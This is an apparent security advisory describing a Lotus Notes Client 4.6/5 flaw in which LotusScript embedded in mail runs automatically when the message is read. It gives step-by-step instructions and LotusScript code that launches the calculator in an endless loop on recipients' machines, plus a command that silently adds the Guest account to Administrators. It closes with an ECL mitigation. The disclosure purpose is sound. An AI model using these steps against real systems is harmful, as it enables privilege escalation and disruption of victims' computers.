|
|
|
|
| |
| A security vulnerability in Lotus Notes Mail allows users to create LotusScript (an internal interpreted language) with a malicious intent, and to cause it to execute without the user's control. |
| |
Credit:
The information has been provided by Yann. Workarounds were suggested by Dan Melamed, Tiensuu Mikael and kenneth at ecab.se.
|
| |
Vulnerable systems:
Lotus Notes Client 5 All releases
Lotus Notes Client 4.6 All releases
With a little LotusScript in your mail, you can execute all what you want on the recipient's computer - even out of Notes.
Follow these steps:
1) Create a new mail, add recipients
2) Go to the body and click in the menu "Create..Object"
3) Select "Control" and any object you please such as "ActiveXPlugin Object"
4) Do one of the following:
In Client 4.6, right click on the object to get "Properties"
In Client 5, click on the menu the new "Applet" feature, and go to "Properties" then check "run the object when the document is read"
5) Then select "Edit events": An event pane opens linked to the object
6) In the "Initialize" section Add the following code, where "My EMAIL" is your Lotus Notes account name (if you get this part wrong, you will bomb yourself):
Sub Initialize
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
7) In the "Terminate" section, do the same:
Sub Terminate
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
8) Click again on the "Initialize" section
9) Hit the "Send" button
Your ActiveX (or other object you choose) is executed during the reading of the document.
In this example we just run the calculator in loop, but there can be infinite possibilities such as formatting hard drives, sending emails, replicating the script to send it to the whole address-book, sending files, stealing files from the victim hard drives without him noticing it and more.
For instance you could replace the Do .. Loop by :
TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)
Which will silently add the Guest account to the Administrative group.
NOTE: The SMTP gateway does not let LotusScript pass through making this an internal treat only.
Solution:
The solution would be to set up a proper ECL (Execution Control List) in the company that will allow only a handful of people to write such malicious code - That would eliminate the problem completely. The user can also edit the ECL by himself to tighten the security even more - thus not allowing anyone to execute such code.
For more information see:
http://www.notes.net/today.nsf/8a6d147cf55a7fd385256658007aacf1/3a9da544637a69b2852568310078b649?OpenDocument
|
|
|
|
|
|
|
|
|
|
